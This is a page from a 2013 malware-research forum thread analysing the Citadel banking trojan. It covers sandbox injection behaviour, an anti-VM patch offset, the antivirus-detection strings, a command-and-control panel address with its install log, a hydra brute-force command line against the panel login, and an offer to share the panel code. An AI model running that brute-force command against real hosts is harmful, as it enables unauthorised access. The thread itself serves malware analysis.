Page 4 of 20

Re: Citadel (Zeus clone)

PostPosted:Fri Jan 04, 2013 11:10 am
by EP_X0FF
Cassiel wrote:@ EP_X0FF

I have run the sample in my VM and I noticed some strange things. If I run it outside BSA it will set the autorun part, if I run it inside BSA it won't.
There are the "usual" registry changes but there is nothing being added to the run key. It is like it puts itself to sleep and then can no longer continue.
Probably it activity restricted by sandbox. Why you want to run malware in VM + Sandboxie?

Re: Citadel (Zeus clone)

PostPosted:Fri Jan 04, 2013 12:05 pm
by Buster_BSA
Cassiel wrote:@ EP_X0FF

I have run the sample in my VM and I noticed some strange things. If I run it outside BSA it will set the autorun part, if I run it inside BSA it won't.
There are the "usual" registry changes but there is nothing being added to the run key. It is like it puts itself to sleep and then can no longer continue.
Probably the malware is injecting code to a system process and then setting autorun part from there. As Sandboxie does not allow injection to processes running outside the sandbox, the process will fail so autorun too.

Re: Citadel (Zeus clone)

PostPosted:Fri Jan 04, 2013 12:40 pm
by Cassiel
@ EP_X0FF

Well my idea was to use a VM with BSA in order to have a snapshot if things went wrong.
I tried cuckoo also however I like the reporting from BSA a lot more then cuckoo.

@ Buster_BSA

You are most likely right, I am going to check this with procmon in order to see how the registry keyis being set.


EDIT:

You are right, it is injecting into explorer and after that it is creating the autorun key.

Re: Citadel (Zeus clone)

PostPosted:Fri Jan 04, 2013 2:32 pm
by Buster_BSA
Cassiel wrote:You are right, it is injecting into explorer and after that it is creating the autorun key.
I would like such injections were being sucessfully done so BSA analysis can be more complete, but the thing depends on Sandboxie´s restrictions. I am going to talk with Ronen about this and I will ask him if there is any workaround to solve the issue.

Re: Citadel (Zeus clone)

PostPosted:Mon Jan 21, 2013 10:10 am
by bsteo
Citadel 1.3.5.1 Rain Edition sample. It have some anti-VM and anti-AVS functions, couldn't run it under Comodo and didn't try manually, maybe someone will do.

Re: Citadel (Zeus clone)

PostPosted:Mon Jan 21, 2013 2:36 pm
by EP_X0FF
exitthematrix wrote:Citadel 1.3.5.1 Rain Edition sample. It have some anti-VM
Not found. Except lame trick with GetKeyboardLayoutList (patch two bytes @00418FC6 with nops) and another lame trick with
Code: Select all
ROOT\SECURITYCENTERROOT\SECURITYCENTER2 SELECT * FROM%sWQL
Antivirus Product company Name display Name version Number Unknown Company:%s
Product:%s
Version:%s
Firewall Product 
Software\Microsoft\Windows\CurrentVersion\Uninstall
Publisher Display Name Display Version%u:%s|%s|%s
Code: Select all
SafenSoft SysWatch  McAfee  McAfee Security Center  McAfee SecurityCenter   Symantec Client   Symantec Protection   Symantec Shared   Symantec Security   Norton Protection   Kaspersky Security  Kaspersky Anti-Virus  avast! Antivirus  AntiVir Desktop   AVG Monitor   AVG Service   AVG Security  ESET Security   ESET Antivirus  Microsoft Inspection  Microsoft Malware   Microsoft Security
+ http://www.kernelmode.info/forum/viewto ... 553#p17553

Patched Zeus result (full disclosure).
http://camas.comodo.com/cgi-bin/submit? ... f9856e4263

No matter how it named - zeus, ice-ix, citadel it all the same slavik shit.

Re: Citadel (Zeus clone)

PostPosted:Mon Jan 21, 2013 4:46 pm
by bsteo
Thank you very much for the tips and help :)

Re: Citadel (Zeus clone)

PostPosted:Mon Jan 21, 2013 5:08 pm
by Xylitol
Code: Select all
• dns: 1 ›› ip: 62.109.1.7 - adresse: CITAB-TEST.TK
http://62.109.1.7/net/panel.php?m=login
Code: Select all
http://62.109.1.7/net/install/
• [0] - Connecting to MySQL as 'citab-test'.
• [0] - Selecting DB 'citab-test'.
• [0] - Updating table 'botnet_list'.
• [0] - Creating table 'botnet_reports'.
• [0] - Updating table 'botnet_reports_130119'.
• [0] - Filling table 'ipv4toc'.
• [0] - Creating table 'ipv4toc'.
• [3] - Updating table 'cp_users'.
• [3] - Updating table 'botnet_scripts'.
• [3] - Updating table 'botnet_scripts_stat'.
• [3] - Updating table 'botnet_software_stat'.
• [3] - Updating table 'exe_updates'.
• [3] - Updating table 'exe_updates_crypter'.
• [3] - Updating table 'accparse_rules'.
• [3] - Updating table 'accparse_accounts'.
• [3] - Updating table 'vnc_bot_connections'.
• [3] - Updating table 'jabber_messages'.
• [3] - Updating table 'botnet_screenshots'.
• [3] - Updating table 'botnet_rep_favorites'.
• [3] - Updating table 'botnet_activity'.
• [3] - Updating table 'botnet_webinjects_group'.
• [3] - Updating table 'botnet_webinjects_group_perms'.
• [3] - Updating table 'botnet_webinjects'.
• [3] - Updating table 'botnet_webinjects_bundle'.
• [3] - Updating table 'botnet_webinjects_bundle_execlim'.
• [3] - Updating table 'botnet_webinjects_bundle_members'.
• [3] - Updating table 'botnet_webinjects_history'.
• [3] - Creating folder '_logos'.
• [3] - Writing config file
• [3] - Searching for the god particle...
• [3] - Creating folder 'system/data'.
• [3] - Creating folder 'public'.
• [3] - Creating folder 'files'.
• [3] - Creating folder 'files/webinjects'.
-- Update complete! --
EP_X0FF wrote:No matter how it named - zeus, ice-ix, citadel it all the same slavik shit.
Code: Select all
-l admin -P pwd.lst -s 80 -w 64 -f -V 62.109.1.7 http-post-form "/net/panel.php?m=login:user=admin&pass=^PASS^:Bad user name or password."
And it's the same command for bruteforce Zeus, Ice9, Citadel.

Re: Citadel (Zeus clone)

PostPosted:Mon Jan 21, 2013 6:59 pm
by bsteo
If someone needs the PHP Admin Panel of this slavik mod shit let me know I can upload it.

Re: Citadel (Zeus clone)

PostPosted:Sat Feb 02, 2013 10:27 am
by R136a1
Seems like Citadel is the new favorite toy of some criminal gangs targeting government organizations:

McAfee Blog: http://blogs.mcafee.com/mcafee-labs/lab ... del-trojan

HitmanPro Blog: https://hitmanpro.wordpress.com/2013/02 ... onnection/